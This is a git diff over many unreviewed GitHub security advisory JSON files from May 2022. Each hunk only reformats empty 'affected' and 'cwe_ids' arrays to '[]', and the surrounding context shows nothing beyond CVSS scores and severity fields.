--git a/advisories/unreviewed/2022/05/GHSA-v75f-3g6x-5hr3/GHSA-v75f-3g6x-5hr3.json b/advisories/unreviewed/2022/05/GHSA-v75f-3g6x-5hr3/GHSA-v75f-3g6x-5hr3.json index d5ffe367f92..9b45764d5ca 100644 --- a/advisories/unreviewed/2022/05/GHSA-v75f-3g6x-5hr3/GHSA-v75f-3g6x-5hr3.json +++ b/advisories/unreviewed/2022/05/GHSA-v75f-3g6x-5hr3/GHSA-v75f-3g6x-5hr3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v8jp-7jrq-rg7x/GHSA-v8jp-7jrq-rg7x.json b/advisories/unreviewed/2022/05/GHSA-v8jp-7jrq-rg7x/GHSA-v8jp-7jrq-rg7x.json index 4b41d3ed6bf..ec519dec989 100644 --- a/advisories/unreviewed/2022/05/GHSA-v8jp-7jrq-rg7x/GHSA-v8jp-7jrq-rg7x.json +++ b/advisories/unreviewed/2022/05/GHSA-v8jp-7jrq-rg7x/GHSA-v8jp-7jrq-rg7x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v8rx-7xrc-grgm/GHSA-v8rx-7xrc-grgm.json b/advisories/unreviewed/2022/05/GHSA-v8rx-7xrc-grgm/GHSA-v8rx-7xrc-grgm.json index f3f0f9bddda..67ccce2a53a 100644 --- a/advisories/unreviewed/2022/05/GHSA-v8rx-7xrc-grgm/GHSA-v8rx-7xrc-grgm.json +++ b/advisories/unreviewed/2022/05/GHSA-v8rx-7xrc-grgm/GHSA-v8rx-7xrc-grgm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vg94-6pc2-88cm/GHSA-vg94-6pc2-88cm.json b/advisories/unreviewed/2022/05/GHSA-vg94-6pc2-88cm/GHSA-vg94-6pc2-88cm.json index 6e3d574f6ab..5e7e4ab8011 100644 --- a/advisories/unreviewed/2022/05/GHSA-vg94-6pc2-88cm/GHSA-vg94-6pc2-88cm.json +++ b/advisories/unreviewed/2022/05/GHSA-vg94-6pc2-88cm/GHSA-vg94-6pc2-88cm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vh4v-fp85-ffwc/GHSA-vh4v-fp85-ffwc.json b/advisories/unreviewed/2022/05/GHSA-vh4v-fp85-ffwc/GHSA-vh4v-fp85-ffwc.json index 470925f4388..b737a9118e5 100644 --- a/advisories/unreviewed/2022/05/GHSA-vh4v-fp85-ffwc/GHSA-vh4v-fp85-ffwc.json +++ b/advisories/unreviewed/2022/05/GHSA-vh4v-fp85-ffwc/GHSA-vh4v-fp85-ffwc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vjx8-8j32-57mf/GHSA-vjx8-8j32-57mf.json b/advisories/unreviewed/2022/05/GHSA-vjx8-8j32-57mf/GHSA-vjx8-8j32-57mf.json index 865241f461b..18d0542a693 100644 --- a/advisories/unreviewed/2022/05/GHSA-vjx8-8j32-57mf/GHSA-vjx8-8j32-57mf.json +++ b/advisories/unreviewed/2022/05/GHSA-vjx8-8j32-57mf/GHSA-vjx8-8j32-57mf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vmj6-8wqf-54hv/GHSA-vmj6-8wqf-54hv.json b/advisories/unreviewed/2022/05/GHSA-vmj6-8wqf-54hv/GHSA-vmj6-8wqf-54hv.json index fb26c65c636..094e0db7012 100644 --- a/advisories/unreviewed/2022/05/GHSA-vmj6-8wqf-54hv/GHSA-vmj6-8wqf-54hv.json +++ b/advisories/unreviewed/2022/05/GHSA-vmj6-8wqf-54hv/GHSA-vmj6-8wqf-54hv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vpxc-xv6p-2cc2/GHSA-vpxc-xv6p-2cc2.json b/advisories/unreviewed/2022/05/GHSA-vpxc-xv6p-2cc2/GHSA-vpxc-xv6p-2cc2.json index 72c80dedbb1..cbaf7a6fe6a 100644 --- a/advisories/unreviewed/2022/05/GHSA-vpxc-xv6p-2cc2/GHSA-vpxc-xv6p-2cc2.json +++ b/advisories/unreviewed/2022/05/GHSA-vpxc-xv6p-2cc2/GHSA-vpxc-xv6p-2cc2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vv59-58m2-94cg/GHSA-vv59-58m2-94cg.json b/advisories/unreviewed/2022/05/GHSA-vv59-58m2-94cg/GHSA-vv59-58m2-94cg.json index 77972fbc23f..c68d2b2fb61 100644 --- a/advisories/unreviewed/2022/05/GHSA-vv59-58m2-94cg/GHSA-vv59-58m2-94cg.json +++ b/advisories/unreviewed/2022/05/GHSA-vv59-58m2-94cg/GHSA-vv59-58m2-94cg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vvmg-xcjf-j2mh/GHSA-vvmg-xcjf-j2mh.json b/advisories/unreviewed/2022/05/GHSA-vvmg-xcjf-j2mh/GHSA-vvmg-xcjf-j2mh.json index faebef925f0..9c941dbc040 100644 --- a/advisories/unreviewed/2022/05/GHSA-vvmg-xcjf-j2mh/GHSA-vvmg-xcjf-j2mh.json +++ b/advisories/unreviewed/2022/05/GHSA-vvmg-xcjf-j2mh/GHSA-vvmg-xcjf-j2mh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vvpg-867h-jmqx/GHSA-vvpg-867h-jmqx.json b/advisories/unreviewed/2022/05/GHSA-vvpg-867h-jmqx/GHSA-vvpg-867h-jmqx.json index 1d78f124563..20a9c36dd63 100644 --- a/advisories/unreviewed/2022/05/GHSA-vvpg-867h-jmqx/GHSA-vvpg-867h-jmqx.json +++ b/advisories/unreviewed/2022/05/GHSA-vvpg-867h-jmqx/GHSA-vvpg-867h-jmqx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vx2p-j4w8-wfw2/GHSA-vx2p-j4w8-wfw2.json b/advisories/unreviewed/2022/05/GHSA-vx2p-j4w8-wfw2/GHSA-vx2p-j4w8-wfw2.json index c1f47e4c481..eae37bb4182 100644 --- a/advisories/unreviewed/2022/05/GHSA-vx2p-j4w8-wfw2/GHSA-vx2p-j4w8-wfw2.json +++ b/advisories/unreviewed/2022/05/GHSA-vx2p-j4w8-wfw2/GHSA-vx2p-j4w8-wfw2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w2wp-3764-9qmf/GHSA-w2wp-3764-9qmf.json b/advisories/unreviewed/2022/05/GHSA-w2wp-3764-9qmf/GHSA-w2wp-3764-9qmf.json index c7d38419a06..ea7fd7b3720 100644 --- a/advisories/unreviewed/2022/05/GHSA-w2wp-3764-9qmf/GHSA-w2wp-3764-9qmf.json +++ b/advisories/unreviewed/2022/05/GHSA-w2wp-3764-9qmf/GHSA-w2wp-3764-9qmf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w3q7-vvpq-gc6g/GHSA-w3q7-vvpq-gc6g.json b/advisories/unreviewed/2022/05/GHSA-w3q7-vvpq-gc6g/GHSA-w3q7-vvpq-gc6g.json index 166e6b67401..5fdd201ae1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3q7-vvpq-gc6g/GHSA-w3q7-vvpq-gc6g.json +++ b/advisories/unreviewed/2022/05/GHSA-w3q7-vvpq-gc6g/GHSA-w3q7-vvpq-gc6g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w3v7-4j7j-756r/GHSA-w3v7-4j7j-756r.json b/advisories/unreviewed/2022/05/GHSA-w3v7-4j7j-756r/GHSA-w3v7-4j7j-756r.json index 2e717cabd77..03b0e0fd079 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3v7-4j7j-756r/GHSA-w3v7-4j7j-756r.json +++ b/advisories/unreviewed/2022/05/GHSA-w3v7-4j7j-756r/GHSA-w3v7-4j7j-756r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w4hq-q9jh-6r3x/GHSA-w4hq-q9jh-6r3x.json b/advisories/unreviewed/2022/05/GHSA-w4hq-q9jh-6r3x/GHSA-w4hq-q9jh-6r3x.json index 45cff123fbe..64a82cf28c8 100644 --- a/advisories/unreviewed/2022/05/GHSA-w4hq-q9jh-6r3x/GHSA-w4hq-q9jh-6r3x.json +++ b/advisories/unreviewed/2022/05/GHSA-w4hq-q9jh-6r3x/GHSA-w4hq-q9jh-6r3x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w58h-rm3c-fxq4/GHSA-w58h-rm3c-fxq4.json b/advisories/unreviewed/2022/05/GHSA-w58h-rm3c-fxq4/GHSA-w58h-rm3c-fxq4.json index d239bdc289c..84b61f7fbf5 100644 --- a/advisories/unreviewed/2022/05/GHSA-w58h-rm3c-fxq4/GHSA-w58h-rm3c-fxq4.json +++ b/advisories/unreviewed/2022/05/GHSA-w58h-rm3c-fxq4/GHSA-w58h-rm3c-fxq4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w5gh-72fc-wfgf/GHSA-w5gh-72fc-wfgf.json b/advisories/unreviewed/2022/05/GHSA-w5gh-72fc-wfgf/GHSA-w5gh-72fc-wfgf.json index 3c6229f83ea..cf9d5eb38cf 100644 --- a/advisories/unreviewed/2022/05/GHSA-w5gh-72fc-wfgf/GHSA-w5gh-72fc-wfgf.json +++ b/advisories/unreviewed/2022/05/GHSA-w5gh-72fc-wfgf/GHSA-w5gh-72fc-wfgf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w5gj-xjvm-cx6r/GHSA-w5gj-xjvm-cx6r.json b/advisories/unreviewed/2022/05/GHSA-w5gj-xjvm-cx6r/GHSA-w5gj-xjvm-cx6r.json index e9c97984a23..28170a1b57e 100644 --- a/advisories/unreviewed/2022/05/GHSA-w5gj-xjvm-cx6r/GHSA-w5gj-xjvm-cx6r.json +++ b/advisories/unreviewed/2022/05/GHSA-w5gj-xjvm-cx6r/GHSA-w5gj-xjvm-cx6r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w5xf-pm8g-5w38/GHSA-w5xf-pm8g-5w38.json b/advisories/unreviewed/2022/05/GHSA-w5xf-pm8g-5w38/GHSA-w5xf-pm8g-5w38.json index 342659e3636..94e53698975 100644 --- a/advisories/unreviewed/2022/05/GHSA-w5xf-pm8g-5w38/GHSA-w5xf-pm8g-5w38.json +++ b/advisories/unreviewed/2022/05/GHSA-w5xf-pm8g-5w38/GHSA-w5xf-pm8g-5w38.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w6m7-4hhv-3385/GHSA-w6m7-4hhv-3385.json b/advisories/unreviewed/2022/05/GHSA-w6m7-4hhv-3385/GHSA-w6m7-4hhv-3385.json index 2078bc5e2a3..530ed2b6b84 100644 --- a/advisories/unreviewed/2022/05/GHSA-w6m7-4hhv-3385/GHSA-w6m7-4hhv-3385.json +++ b/advisories/unreviewed/2022/05/GHSA-w6m7-4hhv-3385/GHSA-w6m7-4hhv-3385.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w8rq-hhvc-jrj9/GHSA-w8rq-hhvc-jrj9.json b/advisories/unreviewed/2022/05/GHSA-w8rq-hhvc-jrj9/GHSA-w8rq-hhvc-jrj9.json index ea999da9653..bab3f4f1690 100644 --- a/advisories/unreviewed/2022/05/GHSA-w8rq-hhvc-jrj9/GHSA-w8rq-hhvc-jrj9.json +++ b/advisories/unreviewed/2022/05/GHSA-w8rq-hhvc-jrj9/GHSA-w8rq-hhvc-jrj9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w9wx-ggvq-j7pc/GHSA-w9wx-ggvq-j7pc.json b/advisories/unreviewed/2022/05/GHSA-w9wx-ggvq-j7pc/GHSA-w9wx-ggvq-j7pc.json index b0e5bd551ac..3e06be2e09d 100644 --- a/advisories/unreviewed/2022/05/GHSA-w9wx-ggvq-j7pc/GHSA-w9wx-ggvq-j7pc.json +++ b/advisories/unreviewed/2022/05/GHSA-w9wx-ggvq-j7pc/GHSA-w9wx-ggvq-j7pc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wcg9-x49q-vrqw/GHSA-wcg9-x49q-vrqw.json b/advisories/unreviewed/2022/05/GHSA-wcg9-x49q-vrqw/GHSA-wcg9-x49q-vrqw.json index 6ccbc0a6443..aa25f659c27 100644 --- a/advisories/unreviewed/2022/05/GHSA-wcg9-x49q-vrqw/GHSA-wcg9-x49q-vrqw.json +++ b/advisories/unreviewed/2022/05/GHSA-wcg9-x49q-vrqw/GHSA-wcg9-x49q-vrqw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wgc8-jcfp-3jm2/GHSA-wgc8-jcfp-3jm2.json b/advisories/unreviewed/2022/05/GHSA-wgc8-jcfp-3jm2/GHSA-wgc8-jcfp-3jm2.json index 556ccf86827..8df9a4d7e5a 100644 --- a/advisories/unreviewed/2022/05/GHSA-wgc8-jcfp-3jm2/GHSA-wgc8-jcfp-3jm2.json +++ b/advisories/unreviewed/2022/05/GHSA-wgc8-jcfp-3jm2/GHSA-wgc8-jcfp-3jm2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wgcv-p6mj-rfr9/GHSA-wgcv-p6mj-rfr9.json b/advisories/unreviewed/2022/05/GHSA-wgcv-p6mj-rfr9/GHSA-wgcv-p6mj-rfr9.json index f84f0c26d12..9d011413050 100644 --- a/advisories/unreviewed/2022/05/GHSA-wgcv-p6mj-rfr9/GHSA-wgcv-p6mj-rfr9.json +++ b/advisories/unreviewed/2022/05/GHSA-wgcv-p6mj-rfr9/GHSA-wgcv-p6mj-rfr9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wggq-rvvx-9vvx/GHSA-wggq-rvvx-9vvx.json b/advisories/unreviewed/2022/05/GHSA-wggq-rvvx-9vvx/GHSA-wggq-rvvx-9vvx.json index 3a4c9fbc6c8..1e7ed7df962 100644 --- a/advisories/unreviewed/2022/05/GHSA-wggq-rvvx-9vvx/GHSA-wggq-rvvx-9vvx.json +++ b/advisories/unreviewed/2022/05/GHSA-wggq-rvvx-9vvx/GHSA-wggq-rvvx-9vvx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wh8q-34g8-m3xr/GHSA-wh8q-34g8-m3xr.json b/advisories/unreviewed/2022/05/GHSA-wh8q-34g8-m3xr/GHSA-wh8q-34g8-m3xr.json index 2ca3170d782..0571db6fae1 100644 --- a/advisories/unreviewed/2022/05/GHSA-wh8q-34g8-m3xr/GHSA-wh8q-34g8-m3xr.json +++ b/advisories/unreviewed/2022/05/GHSA-wh8q-34g8-m3xr/GHSA-wh8q-34g8-m3xr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wj45-6grc-53mj/GHSA-wj45-6grc-53mj.json b/advisories/unreviewed/2022/05/GHSA-wj45-6grc-53mj/GHSA-wj45-6grc-53mj.json index b5d9abf6123..6fefe8ad458 100644 --- a/advisories/unreviewed/2022/05/GHSA-wj45-6grc-53mj/GHSA-wj45-6grc-53mj.json +++ b/advisories/unreviewed/2022/05/GHSA-wj45-6grc-53mj/GHSA-wj45-6grc-53mj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wjrm-3qfx-g6wg/GHSA-wjrm-3qfx-g6wg.json b/advisories/unreviewed/2022/05/GHSA-wjrm-3qfx-g6wg/GHSA-wjrm-3qfx-g6wg.json index ca40e9eb633..4136219aae1 100644 --- a/advisories/unreviewed/2022/05/GHSA-wjrm-3qfx-g6wg/GHSA-wjrm-3qfx-g6wg.json +++ b/advisories/unreviewed/2022/05/GHSA-wjrm-3qfx-g6wg/GHSA-wjrm-3qfx-g6wg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wq6r-8qf6-65vc/GHSA-wq6r-8qf6-65vc.json b/advisories/unreviewed/2022/05/GHSA-wq6r-8qf6-65vc/GHSA-wq6r-8qf6-65vc.json index a94c7d46b75..80b59ea7231 100644 --- a/advisories/unreviewed/2022/05/GHSA-wq6r-8qf6-65vc/GHSA-wq6r-8qf6-65vc.json +++ b/advisories/unreviewed/2022/05/GHSA-wq6r-8qf6-65vc/GHSA-wq6r-8qf6-65vc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wqgv-cf28-r9x6/GHSA-wqgv-cf28-r9x6.json b/advisories/unreviewed/2022/05/GHSA-wqgv-cf28-r9x6/GHSA-wqgv-cf28-r9x6.json index 61c10f6803d..fb0ae23e403 100644 --- a/advisories/unreviewed/2022/05/GHSA-wqgv-cf28-r9x6/GHSA-wqgv-cf28-r9x6.json +++ b/advisories/unreviewed/2022/05/GHSA-wqgv-cf28-r9x6/GHSA-wqgv-cf28-r9x6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wwr6-9vvc-wqq5/GHSA-wwr6-9vvc-wqq5.json b/advisories/unreviewed/2022/05/GHSA-wwr6-9vvc-wqq5/GHSA-wwr6-9vvc-wqq5.json index 326cd49d9c5..a079a6f32c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-wwr6-9vvc-wqq5/GHSA-wwr6-9vvc-wqq5.json +++ b/advisories/unreviewed/2022/05/GHSA-wwr6-9vvc-wqq5/GHSA-wwr6-9vvc-wqq5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x3j8-7w5w-f8m2/GHSA-x3j8-7w5w-f8m2.json b/advisories/unreviewed/2022/05/GHSA-x3j8-7w5w-f8m2/GHSA-x3j8-7w5w-f8m2.json index 7857cf43b87..e55377941f6 100644 --- a/advisories/unreviewed/2022/05/GHSA-x3j8-7w5w-f8m2/GHSA-x3j8-7w5w-f8m2.json +++ b/advisories/unreviewed/2022/05/GHSA-x3j8-7w5w-f8m2/GHSA-x3j8-7w5w-f8m2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x3xx-vhfc-j659/GHSA-x3xx-vhfc-j659.json b/advisories/unreviewed/2022/05/GHSA-x3xx-vhfc-j659/GHSA-x3xx-vhfc-j659.json index 688e9484043..4c75f23f612 100644 --- a/advisories/unreviewed/2022/05/GHSA-x3xx-vhfc-j659/GHSA-x3xx-vhfc-j659.json +++ b/advisories/unreviewed/2022/05/GHSA-x3xx-vhfc-j659/GHSA-x3xx-vhfc-j659.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x4fq-r4qv-4vvh/GHSA-x4fq-r4qv-4vvh.json b/advisories/unreviewed/2022/05/GHSA-x4fq-r4qv-4vvh/GHSA-x4fq-r4qv-4vvh.json index 5eb9a34e463..3952b170151 100644 --- a/advisories/unreviewed/2022/05/GHSA-x4fq-r4qv-4vvh/GHSA-x4fq-r4qv-4vvh.json +++ b/advisories/unreviewed/2022/05/GHSA-x4fq-r4qv-4vvh/GHSA-x4fq-r4qv-4vvh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x4mh-6g26-xmv9/GHSA-x4mh-6g26-xmv9.json b/advisories/unreviewed/2022/05/GHSA-x4mh-6g26-xmv9/GHSA-x4mh-6g26-xmv9.json index afae6cdc93c..d234a560ab2 100644 --- a/advisories/unreviewed/2022/05/GHSA-x4mh-6g26-xmv9/GHSA-x4mh-6g26-xmv9.json +++ 